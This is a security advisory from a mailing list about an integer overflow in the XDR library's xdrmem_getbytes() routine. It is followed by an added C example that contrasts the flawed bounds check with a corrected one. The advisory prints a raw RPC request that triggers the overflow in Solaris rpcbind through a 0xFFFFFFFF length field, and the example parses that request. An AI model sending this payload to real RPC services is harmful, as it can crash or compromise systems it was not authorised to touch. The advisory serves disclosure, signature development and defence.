[UNIX] XDR Integer Overflow (Additional Details)
From: support@securiteam.com
To: list@securiteam.com
Date: 19 Mar 2003 23:25:27 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
XDR Integer Overflow (Additional Details)
------------------------------------------------------------------------
SUMMARY
The following is a follow-up advisory on our previously reported issue:
<http://www.securiteam.com/unixfocus/5LP0G0081U.html> Integer Overflow in
XDR Library.
XDR (External Data Representation) is a standard for describing and encoding
data, and it is used heavily in RPC implementations. Several libraries let a
developer incorporate XDR into an application. Vulnerabilities were discovered
in these libraries during the testing of new Retina auditing technologies
developed by the eEye research department.
ADAM and EVE are two technologies developed by eEye to audit applications,
remotely and locally, for the presence of common vulnerabilities. During an
ADAM audit, an integer overflow was discovered in the Sun Microsystems XDR
library. By supplying specific integer values in length fields during an RPC
transaction, we were able to produce various overflow conditions in UNIX RPC
services.
DETAILS
Vulnerable systems:
* Sun Microsystems Network Services Library (libnsl)
* BSD-derived libraries with XDR/RPC routines (libc)
* GNU C library with sunrpc (glibc)
Technical Description:
The xdrmem_getbytes() function in the XDR library provided by Sun
Microsystems contains an integer overflow in its length handling: a length
value chosen so that the arithmetic on the remaining-buffer count wraps passes
the routine's bounds check, and the copy that follows then uses the oversized
length. Depending on where and how a service uses the vulnerable
xdrmem_getbytes() routine, various conditions may arise that can permit an
attacker to remotely exploit that service.
For the purpose of signature development and further security research, a
sample request is included below that triggers the integer overflow in the
rpcbind shipped with various versions of the Solaris operating system.
/* RPC CALL to the portmapper (program 100000, version 2), procedure 5
   (PMAPPROC_CALLIT), carrying an AUTH_UNIX credential for "localhost".
   The CALLIT arguments name program 100000 again, version 2, procedure 4,
   and then set the argument's opaque length field to 0xFFFFFFFF. */
char evil_rpc[] =
"\x23\x0D\xF6\xD2\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86"
"\xA0\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00"
"\x00\x20\x3D\xD2\xC9\x9F\x00\x00\x00\x09\x6C\x6F\x63\x61\x6C"
"\x68\x6F\x73\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x86"
"\xa0\x00\x00\x00\x02\x00\x00\x00\x04"
"\xFF\xFF\xFF\xFF" // RPC argument length: the value that wraps the check
"EEYECLIPSE2003";
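To make the overflow described above concrete, the following is an added example written for this page; it is not eEye's code, not vendor source, and not part of the original advisory. It reconstructs the xdrmem_getbytes() length check in the shape the Sun-derived XDR memory streams used, a signed remaining-byte counter (x_handy) decremented by an unsigned length, places a corrected check beside it, and then parses the rpcbind payload above with the corrected reader down to the 0xFFFFFFFF argument length. The struct layout, the helper names (safe_getbytes, decode_callit, accepts_len) and the per-field labels in the comments are this example's own assumptions; the vulnerable function deliberately stops at the check and never performs the copy, so the program is safe to run.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* Added example, not eEye's or any vendor's code: the xdrmem_getbytes() check reconstructed in the
 * shape Sun-derived XDR memory streams used, its corrected form, and a walk over the advisory payload. */
typedef struct {
    const unsigned char *x_private;   /* next unread byte */
    int x_handy;                      /* bytes left; signed, as in the vulnerable streams */
} xdr_mem;
/* Vulnerable pattern, check only (the copy is omitted so this stays memory-safe). len is unsigned,
 * so x_handy -= len is computed in unsigned arithmetic: for len = 0xFFFFFFFF it yields x_handy + 1,
 * still >= 0, the check passes, and the real routine would go on to copy 4 GiB past the buffer. */
static bool vuln_getbytes_check(xdr_mem *xdrs, unsigned int len)
{
    if ((xdrs->x_handy -= len) < 0)
        return false;
    return true;
}

/* Corrected form: compare before subtracting, both operands unsigned, so the counter can never go
 * negative. out == NULL skips len bytes without copying them. */
static bool safe_getbytes(xdr_mem *xdrs, void *out, unsigned int len)
{
    if (xdrs->x_handy < 0 || len > (unsigned int)xdrs->x_handy)
        return false;
    if (out != NULL)
        memcpy(out, xdrs->x_private, len);
    xdrs->x_private += len;
    xdrs->x_handy -= (int)len;
    return true;
}

static bool get_u32(xdr_mem *xdrs, uint32_t *v)   /* XDR integers are big-endian */
{
    unsigned char b[4];
    if (!safe_getbytes(xdrs, b, 4)) return false;
    *v = ((uint32_t)b[0] << 24) | ((uint32_t)b[1] << 16) | ((uint32_t)b[2] << 8) | b[3];
    return true;
}
/* Skip an opaque body plus its pad to a 4-byte boundary. The pad is computed on its own because
 * the usual (len + 3) & ~3 rounding would itself wrap to 0 for len = 0xFFFFFFFF. */
static bool skip_opaque(xdr_mem *xdrs, uint32_t len)
{
    return safe_getbytes(xdrs, NULL, len) && safe_getbytes(xdrs, NULL, (4u - (len & 3u)) & 3u);
}

typedef struct {
    int parsed;                                     /* 1 once every field below was decoded */
    uint32_t xid, prog, vers, proc;                 /* outer RPC call header */
    uint32_t callit_prog, callit_vers, callit_proc; /* target named inside the CALLIT arguments */
    uint32_t arg_len;                               /* CALLIT argument length field */
    const unsigned char *arg; int remaining;        /* bytes after that field, and how many */
} rpc_callit;
/* The advisory's payload, byte for byte, regrouped by RPC field. */
static const char evil_rpc[] =
    "\x23\x0D\xF6\xD2" "\x00\x00\x00\x00" "\x00\x00\x00\x02"      /* xid, CALL, rpcvers 2 */
    "\x00\x01\x86\xA0" "\x00\x00\x00\x02" "\x00\x00\x00\x05"      /* prog 100000, vers 2, proc 5 CALLIT */
    "\x00\x00\x00\x01" "\x00\x00\x00\x20"                         /* cred flavor AUTH_UNIX, length 32 */
    "\x3D\xD2\xC9\x9F" "\x00\x00\x00\x09" "localhost\x00\x00\x00" /* stamp, machine name + pad */
    "\x00\x00\x00\x00" "\x00\x00\x00\x00" "\x00\x00\x00\x00"      /* uid, gid, gids count */
    "\x00\x00\x00\x00" "\x00\x00\x00\x00"                         /* verf flavor AUTH_NULL, length 0 */
    "\x00\x01\x86\xA0" "\x00\x00\x00\x02" "\x00\x00\x00\x04"      /* CALLIT target 100000, 2, 4 DUMP */
    "\xFF\xFF\xFF\xFF"                                            /* CALLIT argument length */
    "EEYECLIPSE2003";

static rpc_callit decode_callit(const char *buf, unsigned int buflen)
{
    rpc_callit r;
    uint32_t msg_type, rpcvers, flavor, credlen, verflen;
    xdr_mem x = { (const unsigned char *)buf, (int)buflen };
    memset(&r, 0, sizeof r);
    if (get_u32(&x, &r.xid) && get_u32(&x, &msg_type) && get_u32(&x, &rpcvers) &&
        get_u32(&x, &r.prog) && get_u32(&x, &r.vers) && get_u32(&x, &r.proc) &&
        get_u32(&x, &flavor) && get_u32(&x, &credlen) && skip_opaque(&x, credlen) &&
        get_u32(&x, &flavor) && get_u32(&x, &verflen) && skip_opaque(&x, verflen) &&
        get_u32(&x, &r.callit_prog) && get_u32(&x, &r.callit_vers) &&
        get_u32(&x, &r.callit_proc) && get_u32(&x, &r.arg_len)) {
        r.parsed = 1;
        r.arg = x.x_private;
        r.remaining = x.x_handy;
    }
    return r;
}

/* Would a getbytes of len pass with only the bytes after the advisory's length field left? */
static bool accepts_len(unsigned int len, bool hardened)
{
    rpc_callit r = decode_callit(evil_rpc, (unsigned int)sizeof(evil_rpc) - 1u);
    xdr_mem x = { r.arg, r.remaining };
    return r.parsed && (hardened ? safe_getbytes(&x, NULL, len) : vuln_getbytes_check(&x, len));
}

int main(void)
{
    printf("len=15: vuln=%d hardened=%d; len=0xFFFFFFFF: vuln=%d hardened=%d\n",
           accepts_len(15, false), accepts_len(15, true), accepts_len(~0u, false), accepts_len(~0u, true));
    return 0;
}
```

With the 14 trailing bytes ("EEYECLIPSE2003") as the remaining buffer, the old check correctly rejects a length of 15 but accepts 0xFFFFFFFF, because 14 - 0xFFFFFFFF in unsigned arithmetic is 15; the corrected check rejects both. The separate pad computation in skip_opaque is the same class of caveat in one more place: rounding a length up with (len + 3) & ~3 wraps to 0 for 0xFFFFFFFF, so any length-derived arithmetic has to be bounds-checked before it is trusted, not after.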
Vendor Status:
Sun Microsystems was contacted on November 13, 2002, and CERT was contacted
shortly afterwards. Vendors believed to be vulnerable were contacted by CERT
during a grace period of several months. Because of difficulties in
communicating with vendors, and after several reschedulings, the release date
was set for March 18, 2003.
eEye recommends obtaining the necessary patches or updates from vendors as
they become available following the release of this advisory and the CERT
advisory.
For a list of vendors and their responses, please review the CERT advisory.
SecuriTeam's copy of the original report is at:
<http://www.securiteam.com/unixfocus/5LP0G0081U.html> Integer Overflow in XDR
Library
ADDITIONAL INFORMATION
The information has been provided by Riley Hassell and
<mailto:marc@eeye.com> Marc Maiffret of eEye.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.